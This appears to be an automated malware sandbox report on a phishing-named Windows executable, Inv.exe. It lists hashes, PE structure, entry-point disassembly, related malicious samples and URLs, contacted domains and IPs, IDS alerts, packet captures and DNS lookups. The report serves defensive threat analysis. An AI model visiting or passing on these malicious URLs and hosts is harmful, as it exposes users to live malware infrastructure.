                                              • www.adwhitenc.com/t4vo/?6lbLpdZ0=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzTrOy3I7rglv6LGHEg==&3f=ZlO83hE8VbM
                                              http://wfdzrnqwms.raquelyounglove.org/f10382%0AGet hashmaliciousBrowse
                                              • www.twittercounter.com/embed/coinsblog/ffffff/111111?from=@
                                              http://admleaders.orgGet hashmaliciousBrowse
                                              • www.twittercounter.com/embed/coinsblog/ffffff/111111?from=@
                                              https://frtydx.storage.googleapis.com/1#qs=r-aeikjadjdjikdgiaefgdcgiaehjgjbiaehkgdabababaedahcaccaehdacfbfafkjcgacbGet hashmaliciousBrowse
                                              • www.grindwet.com/qs=r-aeikjadjdjikdgiaefgdcgiaehjgjbiaehkgdabababaedahcaccaehdacfbfafkjcgacb
                                              RFQ No. DAIDO-2020 6675379.exeGet hashmaliciousBrowse
                                              • www.hypertactical.com/mw4n/?FZa0Xr1=h/WvrsbDKPULpHGa/j/ZXvKrfgmmBoIqwyd/vRIUYSPBzftYYlIraPSW83szn4WdzpHm&EvL=B6Axgz
                                              Medical supplies Order - FARAM.exeGet hashmaliciousBrowse
                                              • www.babyshowerstationery.com/a0u/?pN6pRT6=0m1jZNNWqyAlg0YXghbtigmmw7oQIsoxCq42PM7s/Dsa9K2goB1e87e9HXSFK6z7RB+r&BXIxG=ZRVhjzOpgH

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              www.achonabu.comInvoice.exeGet hashmaliciousBrowse
                                              • 172.96.186.206
                                              parkingpage.namecheap.comin.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              urgent specification request.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              inquiry10204168.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              current productlist.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              inv.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              order.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Rfq_Catalog.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              SMA121920.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              scan_118637_pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              SecuriteInfo.com.Heur.16160.xlsGet hashmaliciousBrowse
                                              • 198.54.117.212

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              NAMECHEAP-NETUSQPR-1064.pdf.exeGet hashmaliciousBrowse
                                              • 162.213.253.37
                                              in.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              DHL-Address.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              New FedEx paper work review.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              PO-000202112.exeGet hashmaliciousBrowse
                                              • 63.250.34.114
                                              urgent specification request.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              shipping-document.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                              • 162.255.118.194
                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Purchase Order -263.exeGet hashmaliciousBrowse
                                              • 162.0.232.59
                                              Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                                              • 162.255.119.136
                                              zz4osC4FRa.exeGet hashmaliciousBrowse
                                              • 162.0.238.245
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              DHL-document.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 162.213.255.55
                                              GOOGLEUS74852.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              orden pdf.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              J0OmHIagw8.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              zHgm9k7WYU.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              JAAkR51fQY.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              65BV6gbGFl.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              YvGnm93rap.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                              • 108.177.126.132
                                              VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                              • 8.8.8.8
                                              cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                              • 216.239.38.21
                                              Order_00009.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              13-01-21.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              PO85937758859777.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                              • 108.177.127.132
                                              Order_385647584.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              rB26M8hfIh.exeGet hashmaliciousBrowse
                                              • 8.8.8.8
                                              brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                              • 216.239.34.21
                                              WFLPGBTMZH.dllGet hashmaliciousBrowse
                                              • 108.177.126.132
                                              PO#218740.exeGet hashmaliciousBrowse
                                              • 34.98.99.30
                                              SINGLEHOP-LLCUShttp://mckeepropainting.com/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Paint20200921_2219.pdf.htmlGet hashmaliciousBrowse
                                              • 198.143.164.252
                                              #Ud83d#Udcde_8360.htmGet hashmaliciousBrowse
                                              • 107.6.141.50
                                              http://getfreshnews.com/nuoazaojrnvenpyxyseGet hashmaliciousBrowse
                                              • 184.154.108.232
                                              http://iaaoaot.angelx97.xyz/OCFAheVlOOWYzT2RoWDEvaFEGet hashmaliciousBrowse
                                              • 172.96.186.242
                                              Invoices.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              Request Quotation.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              F9FX9EoKDL.exeGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              All Open.xlsxGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              faithful.exeGet hashmaliciousBrowse
                                              • 173.236.29.82
                                              https://nelleinletapt.buzz/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              https://morelifedrop.net/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              https://soprapaludo.it/Get hashmaliciousBrowse
                                              • 198.143.164.252
                                              https://morelifedrop.net/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              SOA.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              https://konkreto.com.mx/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              Fax UG3J1ECZ.docGet hashmaliciousBrowse
                                              • 67.212.179.164
                                              Check.vbsGet hashmaliciousBrowse
                                              • 65.63.74.20
                                              http://securedoc.sn.am/lZjl9HYl2WqGet hashmaliciousBrowse
                                              • 65.60.61.61
                                              at3nJkOFqF.exeGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              https://calzadosdiscovery.com/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.638953617352006
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Inv.exe
                                              File size:333824
                                              MD5:a3aba7d40da6c8c86e4e8d035803f314
                                              SHA1:469b36f05939d6ec6457f1b72ba9f6c7a960be06
                                              SHA256:1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
                                              SHA512:2cfa59a865a8292b98fb3e8e6ae79a4613d773be87c927ba4cc8e0f034010c0e5ebd0b85a74ca02ef59d47335908bcc610a597bc9cbfbfaaf364d76f51fff2fc
                                              SSDEEP:6144:Sr1I5DbAQcHAORYANcRgOUdQMgV96O5cBTe3pGiO3nhpPgMWOwihgTSE:W1I5fAPHdTdzgV98TetO3hKMMQgT9
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4088a7
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FFEE5F0 [Wed Jan 13 12:22:08 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:e7da020c2fad0c59a3d5e97971484548

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FEC4CE0A261h
                                              jmp 00007FEC4CE02EC5h
                                              push 00000014h
                                              push 0041D838h
                                              call 00007FEC4CE03768h
                                              call 00007FEC4CE06616h
                                              movzx esi, ax
                                              push 00000002h
                                              call 00007FEC4CE0A1F4h
                                              pop ecx
                                              mov eax, 00005A4Dh
                                              cmp word ptr [00400000h], ax
                                              je 00007FEC4CE02EC6h
                                              xor ebx, ebx
                                              jmp 00007FEC4CE02EF5h
                                              mov eax, dword ptr [0040003Ch]
                                              cmp dword ptr [eax+00400000h], 00004550h
                                              jne 00007FEC4CE02EADh
                                              mov ecx, 0000010Bh
                                              cmp word ptr [eax+00400018h], cx
                                              jne 00007FEC4CE02E9Fh
                                              xor ebx, ebx
                                              cmp dword ptr [eax+00400074h], 0Eh
                                              jbe 00007FEC4CE02ECBh
                                              cmp dword ptr [eax+004000E8h], ebx
                                              setne bl
                                              mov dword ptr [ebp-1Ch], ebx
                                              call 00007FEC4CE07603h
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 0000001Ch
                                              call 00007FEC4CE02F95h
                                              pop ecx
                                              call 00007FEC4CE07C6Ch
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 00000010h
                                              call 00007FEC4CE02F84h
                                              pop ecx
                                              call 00007FEC4CE063A8h
                                              and dword ptr [ebp-04h], 00000000h
                                              call 00007FEC4CE04B43h
                                              call dword ptr [004180C8h]
                                              mov dword ptr [00424080h], eax
                                              call 00007FEC4CE0A252h
                                              mov dword ptr [00422284h], eax
                                              call 00007FEC4CE09E53h
                                              test eax, eax
                                              jns 00007FEC4CE02ECAh
                                              push 00000008h
                                              call 00007FEC4CE01A7Ah
                                              pop ecx
                                              call 00007FEC4CE0A06Fh

                                              Rich Headers

                                              Programming Language:
                                              • [LNK] VS2012 build 50727
                                              • [RES] VS2012 build 50727
                                              • [ C ] VS2012 build 50727

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1db940xdc.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1a78.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x270000x1150.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d6e00x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x16d9a0x16e00False0.571176997951data6.6738730891IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x180000x64f80x6600False0.572227328431data6.01779519415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1f0000x50980x3400False0.285531850962data4.70097691284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x250000x1a780x1c00False0.9453125data7.75466359197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x270000x17980x1800False0.606770833333data5.55476531064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_RCDATA0x250700x1a05dataEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllRaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                              msi.dll
                                              loadperf.dllLoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                              MSVFW32.dllStretchDIB
                                              AVIFIL32.dllAVIFileExit, AVIStreamReadData
                                              pdh.dllPdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                              WSOCK32.dllWSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                              GDI32.dllStartDocW, GdiGetSpoolFileHandle, PolyBezier
                                              MAPI32.dll
                                              MSACM32.dllacmDriverPriority, acmFilterTagDetailsA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/13/21-21:26:33.276386TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.4
                                              01/13/21-21:28:17.122550TCP1201ATTACK-RESPONSES 403 Forbidden804976934.102.136.180192.168.2.4

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2021 21:26:33.097670078 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.137716055 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.137829065 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.137989044 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.177892923 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276386023 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276506901 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276700974 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.276757002 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.317466021 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:27:14.839076042 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:14.963711977 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:14.964004040 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:14.964339018 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:15.088922024 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:15.469309092 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:15.639761925 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656807899 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656835079 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656851053 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656866074 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656888962 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656908989 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656928062 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656944990 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656949043 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.656961918 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656975031 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656976938 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.657040119 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.657052040 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:56.262149096 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.454626083 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:27:56.454735041 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.454940081 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.647383928 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:27:56.647411108 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:28:16.939611912 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:16.979912996 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:16.980845928 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:16.982839108 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.023057938 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.122550011 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.122571945 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.123596907 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.124424934 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.165519953 CET804976934.102.136.180192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2021 21:25:26.313123941 CET5370053192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:26.361131907 CET53537008.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:27.104875088 CET5172653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:27.158407927 CET53517268.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:28.452390909 CET5679453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:28.500507116 CET53567948.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:29.828567982 CET5653453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:29.885067940 CET53565348.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:31.100845098 CET5662753192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:31.151740074 CET53566278.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:32.368196011 CET5662153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:32.422194004 CET53566218.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:33.275630951 CET6311653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:33.323690891 CET53631168.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:34.621407986 CET6407853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:34.672171116 CET53640788.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:35.550206900 CET6480153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:35.598148108 CET53648018.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:36.332773924 CET6172153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:36.380810976 CET53617218.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:53.075989962 CET5125553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:53.126849890 CET53512558.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:14.372950077 CET6152253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:14.432109118 CET53615228.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:15.059200048 CET5233753192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:15.115607023 CET53523378.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:15.769350052 CET5504653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:15.828141928 CET53550468.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:16.510773897 CET4961253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:16.567265987 CET53496128.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.014070988 CET4928553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.070439100 CET53492858.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.286334038 CET5060153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.345649004 CET53506018.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.577235937 CET6087553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.628079891 CET53608758.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:18.187264919 CET5644853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:18.270222902 CET53564488.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:18.918555021 CET5917253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:18.969310999 CET53591728.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:19.880409002 CET6242053192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:19.928311110 CET53624208.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:20.811372995 CET6057953192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:20.861788034 CET53605798.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:21.446341038 CET5018353192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:21.544389009 CET53501838.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:33.011740923 CET6153153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:33.091243029 CET53615318.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:33.881355047 CET4922853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:33.941781044 CET53492288.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:53.489366055 CET5979453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:53.588946104 CET53597948.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:06.181643963 CET5591653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:06.229589939 CET53559168.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:08.425323009 CET5275253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:08.494129896 CET53527528.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:14.754261017 CET6054253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:14.836515903 CET53605428.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:35.661072016 CET6068953192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:36.019072056 CET53606898.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:56.201952934 CET6420653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:56.261003017 CET53642068.8.8.8192.168.2.4
                                              Jan 13, 2021 21:28:16.858023882 CET5090453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:28:16.932145119 CET53509048.8.8.8192.168.2.4
                                              Jan 13, 2021 21:28:39.854707003 CET5752553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:28:40.007352114 CET53575258.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 13, 2021 21:26:33.011740923 CET192.168.2.48.8.8.80xdb25Standard query (0)www.millcityloam.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:26:53.489366055 CET192.168.2.48.8.8.80x5ae5Standard query (0)www.jacmkt.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:14.754261017 CET192.168.2.48.8.8.80xbe02Standard query (0)www.achonabu.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:35.661072016 CET192.168.2.48.8.8.80x117bStandard query (0)www.zhaowulu.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.201952934 CET192.168.2.48.8.8.80x5b2aStandard query (0)www.a-zsolutionsllc.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:16.858023882 CET192.168.2.48.8.8.80xa49cStandard query (0)www.nationshiphop.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:39.854707003 CET192.168.2.48.8.8.80x733Standard query (0)www.hwcailing.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 13, 2021 21:26:33.091243029 CET8.8.8.8192.168.2.40xdb25No error (0)www.millcityloam.commillcityloam.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:26:33.091243029 CET8.8.8.8192.168.2.40xdb25No error (0)millcityloam.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:26:53.588946104 CET8.8.8.8192.168.2.40x5ae5Name error (3)www.jacmkt.comnonenoneA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:14.836515903 CET8.8.8.8192.168.2.40xbe02No error (0)www.achonabu.com172.96.186.206A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)www.a-zsolutionsllc.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
